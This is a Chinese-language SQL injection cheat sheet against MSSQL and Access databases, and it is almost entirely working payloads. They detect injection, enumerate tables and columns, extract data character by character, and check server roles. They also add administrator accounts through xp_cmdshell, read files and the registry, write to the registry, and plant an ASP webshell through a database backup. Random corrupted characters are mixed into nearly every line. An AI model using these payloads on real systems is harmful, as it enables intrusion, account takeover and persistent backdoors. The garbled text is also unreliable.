1.判断是否有注入;and 1=1 ;and 1=2 �Dsp��v�c
2.初步判断是否是mssql ;and user>0 �pJFn
8&!J
=bh: U9�0y
3.注入参数是字符'and [查询条件] and ''=' �Y%/RGYKh�
�v(;yy{>8"
4.搜索时没过滤参数的'and [查询条件] and '%25'=' 9��"^ib9�M
z*T��4�1;b
5.判断数据库系统 #U-��y<[
3
"&H'?N%9Up
;and (select count(*) from sysobjects)>0 mssql A�_TaXl��(
��-����G>J
;and (select count(*) from msysobjects)>0 access oO;L� l?�~
3!9�JXq%Hl
�uQ�3sRJ�i
mo<*h��&;&
6.猜数据库 ;and (select Count(*) from [数据库名])>0 �2:�|v�J<Q
�B��P��j?l
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 ~j[?3E�4L}
G�$a@�}9V
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 Y��*@7/2,�
�gE�#�|eiu
9.(1)猜字段的ascii值(access) (8���7wWhH
�z#!<[**&�
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 Aq�(cgTNW�
I'IFBVhaYn
(2)猜字段的ascii值(mssql) GDC��p@%xW
;#zteq�n�
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 4Y�vz-aSyO
c9c]1�X�J�
10.测试权限结构(mssql) �K^o$uUB�e
I�w�Yf�s]-
�2@bOy~�$A
J t�.<Z��&
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- 8{0XqE~ix=
�SOG(&)�b
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- �_f�2�r�z+
+E9G"Z65iP
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- &M5v �EPR�
GTB\�95j]
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- ���,l AZ�4
�
gwI�R�3u
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- ,�62~u'hR5
e,��#w*�|
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- T7�i>aM$+�
�"3j��T�U�
;and 1=(select IS_MEMBER('db_owner'));-- Ngx2N<$<*g
qy?$t�:*pp
E[t[R<v,P!
�{
(.@bT�@
11.添加mssql和系统的帐户 >]��_6|Wfl
��,�L���
;exec master.dbo.sp_addlogin username;-- �78]*Jx>�L
;exec master.dbo.sp_password null,username,password;-- a9&[Qv5�-/
\ro�Jf&O }
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- p�GU�.+[|(
UQkd�$�w�<
;exec master.dbo.xp_cmdshell 'net user username password �r�1q'�+�i
=~�D[M)UO|
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- A __�_|
#R
Ma\�%uEgTD
;exec master.dbo.xp_cmdshell 'net user username password /add';-- 5���Kd"�W,
�t0c�S�.hi
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- �s�h,4n{+
�RC�a1S�^.
e�\���(X:T
k���t�`ln
12.(1)遍历目录 �tW��l'�)^
�W`�LG.`JW
;create table dirs(paths varchar(100), id int) \="��U|LzG
:B��R�_�%$
;insert dirs exec master.dbo.xp_dirtree 'c:\' r[):'ys,�C
J�|jv�qt9C
;and (select top 1 paths from dirs)>0 %� dF�z[�b
a(IE8:y�U`
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) uUS~"\`fk
;R&�W#Q7>3
|63uoRr��
~9�rNP{�+
(2)遍历目录 D4"<suU|�.
Otr=+i
ZI
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- :?E�Z\W�M7
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 Lm!]m\LRZD
�o��x<6�qW
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 C�:&S�k\
�
wGM�oh.GTh
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 >�~7XB�b08
3;b)pQ~6CJ
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 C�&@'o�Lr�
'�/D�2�d�
� �e4_A`j'
@�fA�|�y�
13.mssql中的存储过程 6qQ_�I�0f�
x���| D|d}
xp_regenumvalues 注册表根键, 子键
|,Ks�J2hD
�('�%Y3�z;
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 8d��1qRCIz
��yL�<u>S0
xp_regread 根键,子键,键值名 hG`@�#�9|f
}'{"P#e8"q
;exec xp_regread +��5-��|6�
6�f�0�o'��
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 >8{{H"$;(�
bCTN���^��
xp_regwrite 根键,子键, 值名, 值类型, 值 �3��P75:v
���O|Vc��
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 D�\ZH1C!d
(�-�1�{W^(
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 �NH5sV.vvc
t�?^!OJ:�L
xp_regdeletevalue 根键,子键,值名 t~�}c"�|<t
�6��ym$8^
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 �GGLSmf�b)
b'FT�y���i
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 m�0�W3�pf�
lZkJ<*z#
?t}s3P!Q3w
(VkO[�5�j�
14.mssql的backup创建webshell r1.zURY��
�=>�o �!��
use model �|gk4X�%o6
��L��B.B w
create table cmd(str image); +F,])p4,]i
i,;a( Sy�4
insert into cmd(str) values (''); �y�] 9/Xr/
uDcs2^2��l
backup database model to disk='c:\l.asp'; D�'moy*E�
rkh%[o�9"/
.`u�8�(S+�
�Bk~��lM'
15.mssql内置函数 %�H_�-`�A`
qfAnMBM1�@
;and (select @@version)>0 获得Windows的版本号 O,+9r�_�Gh
��o3GZc�H?
;and user_name()='dbo' 判断当前系统的连接用户是不是sa ��Nv0a]Am
��2ER��_?y
;and (select user_name())>0 爆当前系统的连接用户 37I�Hn6r�\
"Ar|i8^�G3
;and (select db_name())>0 得到当前连接的数据库 �[#�X}��(�
E>E^t=;��[
2!�9W�:�I7
s L�D���Ea
16.简洁的webshell u46Z}~xf�b
�-d2��)�
use model ��7�Kj7or|
%W�P[V{,�F
create table cmd(str image); C\Ob!�sv%H
)_Hv�9!U]e
insert into cmd(str) values ('');
v9T�IEmZ�
��W4#DeT��
backup database model to disk='g:\wwwtest\l.asp';
